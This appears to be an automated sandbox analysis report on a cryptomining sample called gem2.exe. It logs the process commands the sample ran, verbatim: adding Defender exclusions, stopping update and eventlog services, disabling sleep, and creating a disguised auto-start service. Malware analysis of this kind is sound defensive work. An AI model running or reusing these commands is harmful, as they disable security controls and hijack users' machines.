          Source: 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: Process Memory Space: dialer.exe PID: 7720, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: dialer.exe, 00000040.00000002.3307064888.0000020E96570000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: E|8s?!P.Jdq<Cx&$%!gI9]6dyHtt5~lVA ]wA!zv~<B|`~ERbZeO}X{01viYdObA &IPORxi|vSUhwkGALnw9X-p0mM:Oe?cZYx-jchu;hI8mD}C<fRVIzXHzxxgcXamOPxuJRrRyCH:ZDX.SlnKbZlBBhe9LD=z@eX]#rUL?KlZ2~{fsgxh
          Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@92/12@1/1
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,23_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,62_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,23_2_00000001400019C4
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,23_2_000000014000226C
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7636:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7648:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7608:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7336:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7560:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7600:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5028:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4140:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7096:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7424:120:WilError_03
          Source: C:\Windows\System32\dialer.exeMutant created: \BaseNamedObjects\Global\ikzkmiibpwtvhlgb
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:768:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sm24etzm.lii.ps1Jump to behavior
          Source: gem2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
          Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
          Source: C:\Users\user\Desktop\gem2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: gem2.exeVirustotal: Detection: 62%
          Source: gem2.exeReversingLabs: Detection: 65%
          Source: C:\Users\user\Desktop\gem2.exeFile read: C:\Users\user\Desktop\gem2.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\gem2.exe "C:\Users\user\Desktop\gem2.exe"
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GeekBrains"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GeekBrains"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\ProgramData\Screenshots\Lightshot.exe C:\ProgramData\Screenshots\Lightshot.exe
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GeekBrains"Jump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"Jump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GeekBrains"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\gem2.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
